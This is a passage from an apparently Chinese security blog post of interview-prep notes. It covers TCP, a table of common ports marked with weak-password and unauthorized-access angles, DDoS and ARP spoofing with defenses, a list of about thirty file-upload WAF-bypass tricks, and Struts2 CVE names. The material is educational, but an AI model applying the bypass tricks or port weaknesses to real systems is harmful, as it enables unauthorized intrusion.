<p> tcp会按MTU合理分片，接收方会缓存未按序到达的数据，重新排序后再交给应用层。</p>
</li>
</ol>
<p>4、流量控制：当接收方来不及处理发送方的数据，能提示发送方降低发送的速率，防止包丢失。</p>
<p>5、拥塞控制：当网络拥塞时，减少数据的发送。</p>
<p><img src="http://ac-hsnl7zbi.clouddn.com/gKeaXY7TS7XekKwjkhA67DzAznD88lkSgNBmPG7Q.jpg"></p>
<pre><code>信道不可靠, 但是通信双方需要就某个问题达成一致, 而要解决这个问题, 无论你在消息中包含什么信息, 三次通信是理论上的最小值, 所以三次握手不是TCP本身的要求, 而是为了满足&quot;在不可靠信道上可靠地传输信息&quot;这一需求所导致的.请注意这里的本质需求, 信道不可靠, 数据传输要可靠
</code></pre>
<h3 id="端口"><a href="#端口" class="headerlink" title="端口"></a>端口</h3><h4 id="常见端口"><a href="#常见端口" class="headerlink" title="常见端口"></a>常见端口</h4><table>
<thead>
<tr>
<th>Port</th>
<th>Server</th>
<th>Port</th>
<th>Server</th>
<th>Port</th>
<th>Server</th>
</tr>
</thead>
<tbody><tr>
<td>21</td>
<td>FTP</td>
<td>22</td>
<td>SSH</td>
<td>23</td>
<td>Telnet</td>
</tr>
<tr>
<td>80</td>
<td>web</td>
<td>80-89</td>
<td>web</td>
<td>161</td>
<td>SNMP</td>
</tr>
<tr>
<td>389</td>
<td>LDAP</td>
<td>443</td>
<td>SSL</td>
<td>445</td>
<td>SMB</td>
</tr>
<tr>
<td>512,513,514</td>
<td>Rexec</td>
<td>873</td>
<td>Rsync未授权</td>
<td>1025,111</td>
<td>NFS</td>
</tr>
<tr>
<td>1433</td>
<td>MSSQL</td>
<td>1521</td>
<td>Oracle:(iSqlPlus Port:5560,7778)</td>
<td>2082/2083</td>
<td>cpanel主机管理系统登陆 （国外用较多）</td>
</tr>
<tr>
<td>2222</td>
<td>DA虚拟主机管理系统登陆 （国外用较多）</td>
<td>2601,2604</td>
<td>zebra路由，默认密码zebra</td>
<td>3128</td>
<td>squid代理默认端口，如果没设置口令很可能就直接漫游内网了</td>
</tr>
<tr>
<td>3306</td>
<td>MySQL</td>
<td>3312/3311</td>
<td>kangle主机管理系统登陆</td>
<td>3389</td>
<td>远程桌面</td>
</tr>
<tr>
<td>4440</td>
<td>rundeck</td>
<td>5432</td>
<td>PostgreSQL</td>
<td>5900</td>
<td>vnc</td>
</tr>
<tr>
<td>5984</td>
<td>CouchDB <a target="_blank" rel="noopener" href="http://xxx:5984/_utils/">http://xxx:5984/_utils/</a></td>
<td>6082</td>
<td>varnish</td>
<td>6379</td>
<td>redis未授权</td>
</tr>
<tr>
<td>7001,7002</td>
<td>WebLogic默认弱口令，反序列</td>
<td>7778</td>
<td>Kloxo主机控制面板登录</td>
<td>8000-9090</td>
<td>都是一些常见的web端口，有些运维喜欢把管理后台开在这些非80的端口上</td>
</tr>
<tr>
<td>8080</td>
<td>tomcat/WDCP主机管理系统，默认弱口令</td>
<td>8080,8089,9090</td>
<td>JBOSS</td>
<td>8083</td>
<td>Vestacp主机管理系统 （国外用较多）</td>
</tr>
<tr>
<td>8649</td>
<td>ganglia</td>
<td>8888</td>
<td>amh/LuManager 主机管理系统默认端口</td>
<td>9200,9300</td>
<td>elasticsearch</td>
</tr>
<tr>
<td>10000</td>
<td>Virtualmin/Webmin 服务器虚拟主机管理系统</td>
<td>11211</td>
<td>memcache未授权访问</td>
<td>27017,27018</td>
<td>Mongodb未授权访问</td>
</tr>
<tr>
<td>28017</td>
<td>mongodb统计页面</td>
<td>50000</td>
<td>SAP命令执行</td>
<td>50070,50030</td>
<td>hadoop默认端口未授权访问</td>
</tr>
</tbody></table>
<h3 id="版本差异"><a href="#版本差异" class="headerlink" title="版本差异"></a>版本差异</h3><h4 id="MySQL4-5的区别"><a href="#MySQL4-5的区别" class="headerlink" title="MySQL4,5的区别"></a>MySQL4,5的区别</h4><ol>
<li>information_schema(&gt;=5.0)</li>
<li>多用户操作(&gt;=5.0)</li>
</ol>
<h4 id="PHP5-7区别"><a href="#PHP5-7区别" class="headerlink" title="PHP5,7区别"></a>PHP5,7区别</h4><ol>
<li>移除一些旧的扩展，被移迁移到了PECL（例如：mysql）</li>
<li>移除SAPIs的支持</li>
<li><?和<? language=“php”这样的标签被移除了</li>
<li>16进制的字符串转换被废除了</li>
<li>HTTP_RAW_POST_DATA移除了（可以使用php://input替代）</li>
<li>静态函数里面不再支持通过一个不兼容的$this调用一个非静态的函数了 $o = &amp; new className{}，不再支持这样的写法</li>
<li>php.ini文件移除了#作为注释，统一用;去注释</li>
</ol>
<h3 id="DDoS"><a href="#DDoS" class="headerlink" title="DDoS"></a>DDoS</h3><h4 id="DDoS原理-反射原理，TCP可以反射攻击吗"><a href="#DDoS原理-反射原理，TCP可以反射攻击吗" class="headerlink" title="DDoS原理, 反射原理，TCP可以反射攻击吗"></a>DDoS原理, 反射原理，TCP可以反射攻击吗</h4><blockquote>
<p>三种类型</p>
</blockquote>
<ol>
<li>个人组建僵尸网络发动DDoS</li>
<li>利用开放服务器（DNS、NTP、简单网管协议SNMP）脆弱性进行反射攻击</li>
<li>智能/IoT设备协议（简单服务发现协议SSDP，30倍）脆弱性进行反射攻击</li>
</ol>
<h4 id="DDoS防御策略"><a href="#DDoS防御策略" class="headerlink" title="DDoS防御策略"></a>DDoS防御策略</h4><ol>
<li>源验证／反向探测，对源进行探测和人机识别，段包括cookie、识别码等；</li>
<li>限源，即对源IP或协议进行限制，黑名单是一个常见手段；</li>
<li>特征丢弃，依据数据包的特征或访问行为进行丢弃，如基于Payload特征、发包行为特征、QPS特征等；</li>
<li>限速，对流量／访问的速率进行限流。</li>
</ol>
<h4 id="大网站子站的安全性如何保证"><a href="#大网站子站的安全性如何保证" class="headerlink" title="大网站子站的安全性如何保证"></a>大网站子站的安全性如何保证</h4><h3 id="ARP攻击"><a href="#ARP攻击" class="headerlink" title="ARP攻击"></a>ARP攻击</h3><h4 id="原理-3"><a href="#原理-3" class="headerlink" title="原理"></a>原理</h4><pre><code>ARP请求用于询问某IP地址的物理地址(MAC)，只有被询问主机回复，收到后会保留在两机一段时间。
欺骗至少要满足：被信任协议ARP，pc会向所有人广播ARP询问信息X， 并且hacker的信息优先X到达。
攻击：向网络发送大量伪造的IP和MAC地址，占用带宽;并且由于重复发送大量虚假重复信息，虚假信息会导致被攻击主机网络受限或数据包截获。
</code></pre>
<h4 id="ARP为什么能这样做"><a href="#ARP为什么能这样做" class="headerlink" title="ARP为什么能这样做"></a>ARP为什么能这样做</h4><pre><code>ARP是信任协议，ARP设计决定
</code></pre>
<h4 id="ARP如何防范"><a href="#ARP如何防范" class="headerlink" title="ARP如何防范"></a>ARP如何防范</h4><ul>
<li>静态绑定网关IP-MAC</li>
<li>ARP防火墙</li>
<li>VLAN和交换机端口绑定（VLAN划分减少影响；学习地址后再绑定）</li>
<li>动态ARP检查</li>
<li>DAI（DHCP Snooping绑定表+ARP access-list）</li>
<li>IPV6（保存签名，拥有权可验证）</li>
</ul>
<h3 id="上传"><a href="#上传" class="headerlink" title="上传"></a>上传</h3><h4 id="上传绕过WAF"><a href="#上传绕过WAF" class="headerlink" title="上传绕过WAF"></a>上传绕过WAF</h4><ol>
<li>filename在content-type下面</li>
<li>.asp{80-90}</li>
<li>NTFS ADS</li>
<li>.asp…</li>
<li>boundary不一致</li>
<li>iis6分号截断asp.asp;asp.jpg</li>
<li>apache解析漏洞php.php.ddd</li>
<li>boundary和content-disposition中间插入换行</li>
<li>hello.php:a.jpg然后hello.&lt;&lt;&lt;</li>
<li>filename=php.php</li>
<li>filename=”a.txt”;filename=”a.php”</li>
<li>name=\n”file”;filename=”a.php”</li>
<li>content-disposition:\n</li>
<li>.htaccess文件</li>
<li>a.jpg.\nphp</li>
<li>去掉content-disposition的form-data字段</li>
<li>php&lt;5.3 单双引号截断特性</li>
<li>删掉content-disposition: form-data;</li>
<li>content-disposition\00:</li>
<li>{char}+content-disposition</li>
<li>head头的content-type: tab</li>
<li>head头的content-type: multipart/form-DATA</li>
<li>filename后缀改为大写</li>
<li>head头的Content-Type: multipart/form-data;\n</li>
<li>.asp空格</li>
<li>.asp0x00.jpg截断</li>
<li>双boundary</li>
<li>file\nname=”php.php”</li>
<li>head头content-type空格:</li>
<li>form-data字段与name字段交换位置</li>
</ol>
<h3 id="常见漏洞编号"><a href="#常见漏洞编号" class="headerlink" title="常见漏洞编号"></a>常见漏洞编号</h3><ol>
<li>S2-045 Jakarta Multipart解析器 远程命令执行</li>
<li>S2-016 参数action的值redirect以及redirectAction没有正确过滤，导致ognl代码执行</li>
<li>S2-032 用户开启动态方法调用的情况下(method没有过滤)，会被攻击者实现远程代码执行攻击</li>
</ol>
<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ol>
<li>wooyun drops</li>
<li><a target="_blank" rel="noopener" href="http://www.thinkings.org/2017/02/13/my-waf-bypass-series-article.html">http://www.thinkings.org/2017/02/13/my-waf-bypass-series-article.html</a></li>
<li><a target="_blank" rel="noopener" href="http://www.blbana.cc/2016/10/16/266/">http://www.blbana.cc/2016/10/16/266/</a></li>
<li><a target="_blank" rel="noopener" href="http://blog.csdn.net/whuslei/article/details/6667471">http://blog.csdn.net/whuslei/article/details/6667471</a></li>
<li><a target="_blank" rel="noopener" href="https://www.zhihu.com/question/24853633">https://www.zhihu.com/question/24853633</a></li>
<li><a target="_blank" rel="noopener" href="http://jzking121.blog.51cto.com/5436671/1835921">http://jzking121.blog.51cto.com/5436671/1835921</a></li>
<li>遗漏和错误请私戳</li>
</ol>

  </section>

</article>

<section class="read-more">
           
    
               
            <div class="read-more-item">
                <span class="read-more-item-dim">Newer Post</span>
                <h2 class="post-list__post-title post-title"><a href="/2017/03/14/Other-interview-question/" title="Other Interview Question">Other Interview Question</a></h2>
                <p class="excerpt">
                
                说明
一些其他方向的题目收集，被问到的

                &hellip;
                </p>
                <div class="post-list__meta"><time datetime="2017-03-14T08:29:59.000Z" class="post-list__meta--date date">2017-03-14</time> &#8226; <span class="post-list__meta--tags tags">于 
  <a class="-none-link" href="/tags/basic/" rel="tag">basic</a>, <a class="-none-link" href="/tags/interview/" rel="tag">interview</a>, <a class="-none-link" href="/tags/python/" rel="tag">python</a>
</span><a class="btn-border-small" href="/2017/03/14/Other-interview-question/"></a></div>
                           
            </div>
        
        
               
            <div class="read-more-item">
                <span class="read-more-item-dim">Older Post</span>
                <h2 class="post-list__post-title post-title"><a href="/2016/12/15/ingress-API/" title="ingress-API">ingress-API</a></h2>
                <p class="excerpt">
                
                说明目标一共有两个，一个是Intel官方地图，另一个是游戏使用的API
                &hellip;
                </p>
                <div class="post-list__meta"><time datetime="2016-12-15T14:28:18.000Z" class="post-list__meta--date date">2016-12-15</time> &#8226; <span class="post-list__meta--tags tags">于 
  <a class="-none-link" href="/tags/ingress/" rel="tag">ingress</a>
</span><a class="btn-border-small" href="/2016/12/15/ingress-API/"></a></div>
                       
            </div>
        
     
   
   
  
</section>

  

            <footer class="footer">
    <span class="footer__copyright">
        &copy; 2021 lc4t
       
    </span>
    <span class="footer__copyright">
            
         </span>
       
    
    
</footer>


        </div>
    </div>

     
<script>
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	ga('create', 'UA-96200907-1', 'auto');
	ga('send', 'pageview');
</script>

    
    <script>
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?a9801aa00a5615a147c66e9f1f2893c6";
            var s = document.getElementsByTagName("script")[0]; 
            s.parentNode.insertBefore(hm, s);
        })();
    </script>



    <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    
</body>
</html>
